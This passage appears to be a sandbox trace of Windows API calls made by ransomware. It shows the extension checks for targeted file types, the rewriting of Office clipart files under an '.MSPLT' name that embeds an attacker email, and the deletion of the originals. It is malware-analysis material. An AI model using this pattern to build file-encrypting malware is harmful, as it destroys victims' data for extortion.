office\\root\\clipart\\pub60cor\\dd00117_.wmf")) returned 1 [0317.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.048] lstrlenW (lpString=".doc") returned 4 [0317.048] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0317.048] lstrlenW (lpString=".docx") returned 5 [0317.048] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0317.048] lstrlenW (lpString=".pdf") returned 4 [0317.048] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0317.048] lstrlenW (lpString=".xls") returned 4 [0317.048] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0317.048] lstrlenW (lpString=".xlsx") returned 5 [0317.048] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0317.048] lstrlenW (lpString=".ppt") returned 4 [0317.048] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0317.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.048] lstrlenW (lpString=".zip") returned 4 [0317.048] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0317.048] lstrlenW (lpString=".rar") returned 4 [0317.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0317.049] lstrlenW (lpString=".bz2") returned 4 [0317.049] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0317.049] lstrlenW (lpString=".7z") returned 3 [0317.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0317.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.049] lstrlenW (lpString=".dbf") returned 4 [0317.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0317.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.049] lstrlenW (lpString=".1cd") returned 4 [0317.049] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0317.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.049] lstrlenW (lpString=".jpg") returned 4 [0317.049] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0317.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.049] lstrlenW (lpString=".doc") returned 4 [0317.049] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0317.049] lstrlenW (lpString=".docx") returned 5 [0317.049] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0317.049] lstrlenW (lpString=".pdf") returned 4 [0317.049] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0317.049] lstrlenW (lpString=".xls") returned 4 [0317.050] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0317.050] lstrlenW (lpString=".xlsx") returned 5 [0317.050] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0317.050] lstrlenW (lpString=".ppt") returned 4 [0317.050] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0317.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.050] lstrlenW (lpString=".zip") returned 4 [0317.050] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0317.050] lstrlenW (lpString=".rar") returned 4 [0317.050] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0317.050] lstrlenW (lpString=".bz2") returned 4 [0317.050] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0317.050] lstrlenW (lpString=".7z") returned 3 [0317.050] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0317.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.050] lstrlenW (lpString=".dbf") returned 4 [0317.050] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0317.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.050] lstrlenW (lpString=".1cd") returned 4 [0317.050] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0317.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0317.050] lstrlenW (lpString=".jpg") returned 4 [0317.050] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0317.050] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0317.051] lstrlenW (lpString="DD00121_.WMF") returned 12 [0317.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0317.271] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=8256) returned 1 [0317.271] CloseHandle (hObject=0x470) returned 1 [0317.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf")) returned 0x220 [0317.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0317.273] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0317.273] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0317.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0317.274] GetLastError () returned 0x0 [0317.274] ReadFile (in: hFile=0x470, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x2040, lpOverlapped=0x0) returned 1 [0317.323] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x2050, lpOverlapped=0x0) returned 1 [0317.325] ReadFile (in: hFile=0x470, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0317.325] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0317.325] SetEndOfFile (hFile=0x51c) returned 1 [0318.058] CloseHandle (hObject=0x51c) returned 1 [0318.059] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0318.059] SetEndOfFile (hFile=0x470) returned 1 [0318.545] CloseHandle (hObject=0x470) returned 1 [0318.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0318.892] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf")) returned 1 [0319.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.220] lstrlenW (lpString=".doc") returned 4 [0319.220] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.220] lstrlenW (lpString=".docx") returned 5 [0319.220] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.220] lstrlenW (lpString=".pdf") returned 4 [0319.220] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.220] lstrlenW (lpString=".xls") returned 4 [0319.220] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.220] lstrlenW (lpString=".xlsx") returned 5 [0319.220] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.220] lstrlenW (lpString=".ppt") returned 4 [0319.220] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.220] lstrlenW (lpString=".zip") returned 4 [0319.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.220] lstrlenW (lpString=".rar") returned 4 [0319.220] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.220] lstrlenW (lpString=".bz2") returned 4 [0319.220] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.220] lstrlenW (lpString=".7z") returned 3 [0319.220] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.221] lstrlenW (lpString=".dbf") returned 4 [0319.221] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.221] lstrlenW (lpString=".1cd") returned 4 [0319.221] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.221] lstrlenW (lpString=".jpg") returned 4 [0319.221] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.484] lstrlenW (lpString=".doc") returned 4 [0319.484] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.484] lstrlenW (lpString=".docx") returned 5 [0319.484] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.484] lstrlenW (lpString=".pdf") returned 4 [0319.484] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.484] lstrlenW (lpString=".xls") returned 4 [0319.484] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.484] lstrlenW (lpString=".xlsx") returned 5 [0319.484] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.484] lstrlenW (lpString=".ppt") returned 4 [0319.484] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.484] lstrlenW (lpString=".zip") returned 4 [0319.485] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.485] lstrlenW (lpString=".rar") returned 4 [0319.485] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.485] lstrlenW (lpString=".bz2") returned 4 [0319.485] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.485] lstrlenW (lpString=".7z") returned 3 [0319.485] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.485] lstrlenW (lpString=".dbf") returned 4 [0319.485] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.485] lstrlenW (lpString=".1cd") returned 4 [0319.485] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0319.485] lstrlenW (lpString=".jpg") returned 4 [0319.485] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.485] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.485] lstrlenW (lpString="DD00297_.WMF") returned 12 [0319.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.487] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=40030) returned 1 [0319.487] CloseHandle (hObject=0x3b0) returned 1 [0319.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf")) returned 0x220 [0319.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.488] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.489] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0319.490] GetLastError () returned 0x0 [0319.490] ReadFile (in: hFile=0x3b0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x9c5e, lpOverlapped=0x0) returned 1 [0319.496] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x9c60, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x9c60, lpOverlapped=0x0) returned 1 [0319.498] ReadFile (in: hFile=0x3b0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.498] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.498] SetEndOfFile (hFile=0x488) returned 1 [0319.498] CloseHandle (hObject=0x488) returned 1 [0319.499] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.499] SetEndOfFile (hFile=0x3b0) returned 1 [0319.504] CloseHandle (hObject=0x3b0) returned 1 [0319.504] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.504] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf")) returned 1 [0319.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.505] lstrlenW (lpString=".doc") returned 4 [0319.505] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.505] lstrlenW (lpString=".docx") returned 5 [0319.505] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.505] lstrlenW (lpString=".pdf") returned 4 [0319.505] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.505] lstrlenW (lpString=".xls") returned 4 [0319.505] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.506] lstrlenW (lpString=".xlsx") returned 5 [0319.506] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.506] lstrlenW (lpString=".ppt") returned 4 [0319.506] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.506] lstrlenW (lpString=".zip") returned 4 [0319.506] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.506] lstrlenW (lpString=".rar") returned 4 [0319.506] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.506] lstrlenW (lpString=".bz2") returned 4 [0319.506] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.506] lstrlenW (lpString=".7z") returned 3 [0319.506] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.506] lstrlenW (lpString=".dbf") returned 4 [0319.506] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.506] lstrlenW (lpString=".1cd") returned 4 [0319.506] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.506] lstrlenW (lpString=".jpg") returned 4 [0319.506] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.506] lstrlenW (lpString=".doc") returned 4 [0319.506] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.507] lstrlenW (lpString=".docx") returned 5 [0319.507] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.507] lstrlenW (lpString=".pdf") returned 4 [0319.507] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.507] lstrlenW (lpString=".xls") returned 4 [0319.507] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.507] lstrlenW (lpString=".xlsx") returned 5 [0319.507] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.507] lstrlenW (lpString=".ppt") returned 4 [0319.507] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.507] lstrlenW (lpString=".zip") returned 4 [0319.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.507] lstrlenW (lpString=".rar") returned 4 [0319.507] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.507] lstrlenW (lpString=".bz2") returned 4 [0319.507] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.507] lstrlenW (lpString=".7z") returned 3 [0319.507] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.507] lstrlenW (lpString=".dbf") returned 4 [0319.507] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.507] lstrlenW (lpString=".1cd") returned 4 [0319.507] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 68 [0319.507] lstrlenW (lpString=".jpg") returned 4 [0319.508] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.508] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.508] lstrlenW (lpString="DD00372_.WMF") returned 12 [0319.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.510] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=792) returned 1 [0319.510] CloseHandle (hObject=0x3b0) returned 1 [0319.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf")) returned 0x220 [0319.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.511] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.511] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0319.512] GetLastError () returned 0x0 [0319.512] ReadFile (in: hFile=0x3b0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x318, lpOverlapped=0x0) returned 1 [0319.515] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x320, lpOverlapped=0x0) returned 1 [0319.516] ReadFile (in: hFile=0x3b0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.517] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.517] SetEndOfFile (hFile=0x488) returned 1 [0319.517] CloseHandle (hObject=0x488) returned 1 [0319.517] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.517] SetEndOfFile (hFile=0x3b0) returned 1 [0319.521] CloseHandle (hObject=0x3b0) returned 1 [0319.521] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.521] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf")) returned 1 [0319.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 